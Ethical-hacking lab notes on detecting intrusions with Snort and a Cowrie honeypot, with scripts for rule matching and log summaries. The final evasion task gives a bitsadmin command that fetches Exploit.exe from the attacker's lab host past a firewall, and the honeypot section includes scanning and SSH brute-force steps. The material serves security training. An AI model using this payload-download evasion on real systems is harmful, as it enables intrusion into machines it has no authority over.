# Module 12: Evading IDS, Firewalls, Honeypots

Ethical hackers or pen testers use numerous tools and techniques to evade the IDS and firewall on the target network. Recommended labs that will assist you in learning various evasion techniques include:

1. Perform intrusion detection using various tools
   * Detect intrusions using Snort
   * Deploy Cowrie honeypot to detect malicious network traffic
2. Evade IDS/firewalls using various evasion techniques
   * Evade firewall through Windows BITSAdmin

## Lab 1: Perform Intrusion Detection using Various Tools <a href="#lab-1-perform-intrusion-detection-using-various-tools" id="lab-1-perform-intrusion-detection-using-various-tools"></a>

### Task 1: Detect Intrusions using Snort <a href="#task-1-detect-intrusions-using-snort" id="task-1-detect-intrusions-using-snort"></a>

#### 1. **Snort Installation:**

* **Launch the Windows 11 machine** and log in as `Admin` using `Pa$$w0rd`.
* Navigate to the Snort installation directory (`E:\CEH-Tools\CEHv13 Module 12\Intrusion Detection Tools\Snort`) and run the **Snort installer** (`Snort_2_9_15_Installe.x64.exe`).
* Accept the license agreement and follow the installation wizard to install Snort. The default install location is `C:\Snort`.

#### 2. **Copy Configuration Files:**

* Copy the necessary configuration files (e.g., `snort.conf`, `so_rules`, `preproc_rules`, and `rules` folders) from the provided location (`E:\CEH-Tools\...`) to `C:\Snort`.
* Replace any existing files in the `C:\Snort\etc` folder with the new ones.

#### 3. **Initial Snort Setup:**

* Open a **Command Prompt** and navigate to `C:\Snort\bin`.
* Run `snort` to initialize Snort and then use `snort -W` to list your network interfaces.
* Identify the Ethernet driver index (e.g., `1`) and start Snort sniffing on that interface with `snort -dev -i 1` (`-d` dumps application-layer data, `-e` shows link-layer headers, `-v` is verbose).

#### 4. **Test Snort:**

* Leave the Snort window running and open another command prompt.
* Run a **ping command** (`ping google.com`) from the same machine to trigger a Snort alert.
* Verify that Snort detects the ping probe and generates an alert.

#### 5. **Configure `snort.conf`:**

* Open the `snort.conf` file in **Notepad++**.
* **Modify network variables** in the `snort.conf` file:
  * Set `HOME_NET` to the IP address of the Windows 11 machine (e.g., `10.10.1.11`).
  * Leave `EXTERNAL_NET` as `any`.
  * Set other server variables (e.g., `DNS_SERVERS`, `SMTP_SERVERS`, etc.) as needed.
* Update `RULE_PATH`, `so_rules`, and `preproc_rules` to the correct paths (e.g., `C:\Snort\rules`).
* Configure dynamic preprocessor libraries with the correct paths.
* Comment out unnecessary preprocessor rules.
* Set output plugin paths for `classification.config` and `reference.config`.
* Replace `ipvar` with `var` for the network variables, since the Snort build used in this lab does not accept `ipvar`.

#### 6. **Enable Detection Rules:**

* Navigate to the `C:\Snort\rules` directory and **enable ICMP rules** by editing `icmp-info.rules`.
* Modify the rule to detect ICMP ping probes directed at the system (e.g., `alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.1.11`).

#### 7. **Run Snort in IDS Mode:**

* Run Snort using the command:

  ```
  snort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii
  ```

  Replace `X` with the Ethernet interface index (e.g., `1`). `-A console` prints alerts to the console, `-c` loads the configuration file, `-l` sets the log directory and `-K ascii` writes the packet logs in ASCII.
* Snort starts in IDS mode, initializes, and waits for attacks.

#### 8. **Simulate an Attack:**

* Switch to the **Windows Server 2019 (Attacker machine)** and use the command:

  ```
  ping 10.10.1.11 -t
  ```

  (Replace `10.10.1.11` with the actual IP address of the Windows 11 machine).
* Snort on Windows 11 detects this ping and triggers an alert.

#### 9. **Check Snort Logs:**

* After Snort detects the attack, go to the **Snort log directory** (`C:\Snort\log\10.10.1.11`) and open the `ICMP_ECHO.ids` file.
* The log file contains entries of detected attacks.

#### 10. **Completion:**

* The Snort IDS successfully detected and logged the attack (ping), indicating that the setup was successful.
* Close all open windows on both machines.
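The detection in steps 5 to 8 depends on the `HOME_NET` variable and the ICMP rule header working together. The following is an added example (not part of the lab or of Snort itself) that parses a constructed `snort.conf` fragment in the lab's `var` form, resolves `$HOME_NET`/`$EXTERNAL_NET` in a rule header, and shows that the attacker's ping toward the Windows 11 host matches while outbound traffic does not; the rule's option block and the event tuples are assumed values.

```python
import ipaddress
import re

# Constructed snort.conf fragment mirroring the lab edits (var, not ipvar; HOME_NET = Windows 11 host).
SNORT_CONF = """\
var HOME_NET 10.10.1.11
var EXTERNAL_NET any
var RULE_PATH C:\\Snort\\rules
"""

# Constructed rule in the shape of the lab's ICMP rule; msg/sid are assumed values.
ICMP_RULE = 'alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP-INFO PING"; sid:1000001;)'

HEADER_RE = re.compile(r'^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\(')

def parse_vars(conf):
    """Collect `var NAME value` (and `ipvar`) lines into a dict."""
    found = {}
    for line in conf.splitlines():
        m = re.match(r'^\s*(?:var|ipvar)\s+(\w+)\s+(.+?)\s*$', line)
        if m:
            found[m.group(1)] = m.group(2)
    return found

def address_matches(spec, ip, variables):
    """Resolve $VAR, then test `any`, `!x` negation, or a CIDR / single host."""
    if spec.startswith('$'):
        spec = variables[spec[1:]]
    if spec == 'any':
        return True
    if spec.startswith('!'):
        return not address_matches(spec[1:], ip, variables)
    return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)

def rule_matches(rule, variables, proto, src, dst):
    """True if the rule header matches a packet with this protocol, source and destination."""
    _action, rproto, rsrc, _sport, direction, rdst, _dport = HEADER_RE.match(rule).groups()
    if rproto != proto:
        return False
    forward = address_matches(rsrc, src, variables) and address_matches(rdst, dst, variables)
    if direction == '<>':  # bidirectional header also matches the reverse direction
        return forward or (address_matches(rsrc, dst, variables) and address_matches(rdst, src, variables))
    return forward

if __name__ == '__main__':
    v = parse_vars(SNORT_CONF)
    # Attacker (assumed 10.10.1.19) pinging the Windows 11 host: alert fires.
    print(rule_matches(ICMP_RULE, v, 'icmp', '10.10.1.19', '10.10.1.11'))
    # Windows 11 host pinging out (step 4's ping google.com): destination is not HOME_NET, no alert.
    print(rule_matches(ICMP_RULE, v, 'icmp', '10.10.1.11', '8.8.8.8'))
```

Leaving `HOME_NET` at its default `any` would make the second case match too, which is why step 5 pins it to the host address.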

***

### Task 2: Deploy Cowrie Honeypot to Detect Malicious Network Traffic <a href="#task-2-deploy-cowrie-honeypot-to-detect-malicious-network-traffic" id="task-2-deploy-cowrie-honeypot-to-detect-malicious-network-traffic"></a>

#### **1. Create Cowrie User and Prepare Environment:**

* **Login to Ubuntu**: Use `Ubuntu/toor` credentials.
* **Create a new user** `cowrie` (with no password) by running:

  ```bash
  sudo adduser --disabled-password cowrie
  ```

  Follow the prompts and confirm.

#### **2. Access Cowrie Files:**

* **Navigate to CEH-Tools**: Open `Files` on the Ubuntu machine and copy the `cowrie` folder from the network share (`10.10.1.11/CEHv13 Module 12...`) to `/home/ubuntu`.
* If `ceh-tools` is not visible, **Connect to Server** (`smb://10.10.1.11`), enter credentials (`Admin/Pa$$w0rd`), and navigate to the `cowrie` folder.

#### **3. Install Dependencies:**

* Open a terminal and switch to **root user**:

  ```bash
  sudo su
  ```
* Navigate to `cowrie` directory and install dependencies:

  ```bash
  cd cowrie
  pip install --upgrade -r requirements.txt
  ```
* Change to `/home/ubuntu` and modify file permissions:

  ```bash
  chmod -R 777 cowrie
  ```

#### **4. Set Up Port Redirection:**

* **Redirect SSH traffic** (port 22) to Cowrie's port 2222 using `iptables`:

  ```bash
  iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
  ```

#### **5. Configure Cowrie to Run on Port 22:**

* Use `authbind` to allow the `cowrie` user to bind to port 22:

  ```bash
  touch /etc/authbind/byport/22
  chown cowrie:cowrie /etc/authbind/byport/22
  chmod 770 /etc/authbind/byport/22
  ```

#### **6. Create Virtual Environment:**

* Create and activate a Python virtual environment:

  ```bash
  virtualenv --python=python3 cowrie-env
  source cowrie-env/local/bin/activate
  ```

#### **7. Start Cowrie Honeypot:**

* Navigate to the `cowrie` directory and start the honeypot:

  ```bash
  bin/cowrie start
  ```

#### **8. View Cowrie Logs:**

* Open the log file to check for incoming SSH connections:

  ```bash
  cd /var/log/cowrie/
  tail cowrie.log
  ```
* Ensure that the log shows: "Ready to accept SSH connections."

#### **9. Simulate Attacks from Parrot Security:**

* **Switch to Parrot Security machine** and run `nmap` to scan for open ports on the target:

  ```bash
  nmap -p- -sV 10.10.1.9
  ```
* You should see **port 22** open, indicating the honeypot is running on this port.
* **Attempt SSH Brute-Force**: Use **PuTTY** to attempt SSH login (use `ubuntu/toor` or random credentials). The connection will be redirected to the Cowrie honeypot.

#### **10. Observe Attack in Cowrie Logs:**

* **Switch back to Ubuntu machine** and run:

  ```bash
  tail cowrie.log
  ```
* The log will capture the attacker’s SSH connection attempts and interactions.
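Reading `cowrie.log` with `tail` shows individual lines; what a defender usually wants from step 10 is a per-source view of the login attempts. The following is an added example (not part of the lab or of the Cowrie project) that parses constructed log lines modeled on Cowrie's text log format, counts connections and failed/successful logins per source address, and flags sources that exceed a failure threshold; the addresses, session id and credentials in the sample are made up.

```python
import re
from collections import defaultdict

# Constructed sample modeled on Cowrie's text log lines (not a real capture); hosts as in the lab.
SAMPLE_LOG = """\
2024-05-01T10:11:58.000001Z [-] Ready to accept SSH connections
2024-05-01T10:12:03.123456Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 10.10.1.13:49210 (10.10.1.9:2222) [session: a1b2c3d4e5f6]
2024-05-01T10:12:05.001122Z [HoneyPotSSHTransport,0,10.10.1.13] login attempt [b'ubuntu'/b'toor'] failed
2024-05-01T10:12:07.004455Z [HoneyPotSSHTransport,0,10.10.1.13] login attempt [b'root'/b'123456'] failed
2024-05-01T10:12:09.006677Z [HoneyPotSSHTransport,0,10.10.1.13] login attempt [b'admin'/b'admin'] failed
2024-05-01T10:12:11.008899Z [HoneyPotSSHTransport,0,10.10.1.13] login attempt [b'root'/b'root'] succeeded
2024-05-01T10:13:40.000000Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 10.10.1.22:51001 (10.10.1.9:2222) [session: f6e5d4c3b2a1]
2024-05-01T10:13:42.000000Z [HoneyPotSSHTransport,1,10.10.1.22] login attempt [b'pi'/b'raspberry'] failed
"""

# Connection lines carry the source and the honeypot-side port (2222 behind the iptables redirect).
CONNECT_RE = re.compile(r'New connection: (\d+\.\d+\.\d+\.\d+):\d+ \([\d.]+:(\d+)\) \[session: (\w+)\]')
# Login lines carry the source address, the credential pair and the outcome.
LOGIN_RE = re.compile(r"\[HoneyPotSSHTransport,\d+,(\d+\.\d+\.\d+\.\d+)\] login attempt "
                      r"\[b'([^']*)'/b'([^']*)'\] (failed|succeeded)")

def summarize(log_text, fail_threshold=3):
    """Per-source counts of sessions and login outcomes, plus the credentials tried."""
    stats = defaultdict(lambda: {'sessions': 0, 'failed': 0, 'succeeded': 0, 'creds': [], 'ports': set()})
    for line in log_text.splitlines():
        m = CONNECT_RE.search(line)
        if m:
            src, port, _session = m.groups()
            stats[src]['sessions'] += 1
            stats[src]['ports'].add(int(port))
            continue
        m = LOGIN_RE.search(line)
        if m:
            src, user, password, result = m.groups()
            stats[src][result] += 1
            stats[src]['creds'].append((user, password))
    for s in stats.values():
        # A source with at least fail_threshold failed logins is treated as a brute-force attempt.
        s['brute_force'] = s['failed'] >= fail_threshold
    return dict(stats)

if __name__ == '__main__':
    for src, s in summarize(SAMPLE_LOG).items():
        print(src, s['sessions'], 'sessions', s['failed'], 'failed', s['succeeded'], 'ok',
              'BRUTE-FORCE' if s['brute_force'] else '')
```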

***

## Lab 2: Evade IDS/Firewalls using Various Evasion Techniques <a href="#lab-2-evade-idsfirewalls-using-various-evasion-techniques" id="lab-2-evade-idsfirewalls-using-various-evasion-techniques"></a>

### Task 1: Evade Firewall through Windows BITSAdmin <a href="#task-1-evade-firewall-through-windows-bitsadmin" id="task-1-evade-firewall-through-windows-bitsadmin"></a>

```
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
```
